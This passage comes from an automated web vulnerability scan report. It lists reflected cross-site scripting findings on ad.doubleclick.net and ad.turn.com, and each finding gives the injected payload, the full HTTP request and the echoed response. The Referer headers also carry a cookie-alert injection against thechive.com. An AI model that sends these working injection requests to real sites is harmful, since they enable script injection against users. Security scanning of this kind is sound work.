Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55862'-alert(1)-'5c8556f2836 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

3.38. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aec3"-alert(1)-"b8c1ebf1bd1 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

3.39. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19f04'-alert(1)-'18424983c20 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

3.40. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd73e"-alert(1)-"c148583078f was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "op
...[SNIP]...

3.41. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e22"-alert(1)-"740480bcef9 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.42. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef59'-alert(1)-'24e894d3194 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

3.43. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bc0b"-alert(1)-"ee4b25273ee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273ee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:16 GMT
Expires: Mon, 07 Feb 2011 02:28:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273eehttp%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

3.44. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b432f'-alert(1)-'0eb20d682e8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5908
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:20 GMT
Expires: Mon, 07 Feb 2011 02:28:20 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

3.45. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18aaa'-alert(1)-'1667d1ce1b1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\">
...[SNIP]...

3.46. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.55

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 132c3"-alert(1)-"27b6307f1fc was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5908

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

3.47. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933c7"><script>alert(1)</script>c46c0426e93 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=933c7"><script>alert(1)</script>c46c0426e93 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
